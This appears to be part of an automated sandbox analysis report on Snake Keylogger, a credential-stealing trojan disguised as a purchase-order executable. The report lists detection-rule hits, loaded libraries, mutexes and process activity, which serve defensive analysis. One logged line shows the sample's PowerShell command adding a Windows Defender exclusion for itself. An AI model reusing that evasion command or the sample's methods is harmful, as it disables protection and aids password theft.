                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A51384_2_066A5138
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ADF204_2_066ADF20
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ADF1F4_2_066ADF1F
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A1F9B4_2_066A1F9B
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AEC284_2_066AEC28
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AEC184_2_066AEC18
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A8CC04_2_066A8CC0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A8CB14_2_066A8CB1
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A9D294_2_066A9D29
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ACDC04_2_066ACDC0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ACDAF4_2_066ACDAF
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ADAC84_2_066ADAC8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066ADAB94_2_066ADAB9
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A0B204_2_066A0B20
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A0B304_2_066A0B30
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A18414_2_066A1841
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AF9224_2_066AF922
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066AF9304_2_066AF930
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2428
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000000.1103341423.0000000000E6E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameucxt.exe8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.000000000359A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139642245.00000000077D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1135188484.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000034A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.000000000344C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139042622.0000000005C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeBinary or memory string: OriginalFilenameucxt.exe8 vs SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, J---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, J---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, J---.csBase64 encoded string: 'KWRVsNJa7mk/oSuy2WfCkJjef7DgvfIcJ9l2tJhRpe7qa6fDVQRFScVnsdwZVygn'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, J---.csBase64 encoded string: 'KWRVsNJa7mk/oSuy2WfCkJjef7DgvfIcJ9l2tJhRpe7qa6fDVQRFScVnsdwZVygn'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb<
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/16@3/4
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMutant created: \Sessions\1\BaseNamedObjects\XlUPkZePZTQsgTLLJydQbYD
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kxnz5kp2.rrh.ps1Jump to behavior
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002C10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeVirustotal: Detection: 28%
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile read: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2428
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: sppc.dllJump to behavior
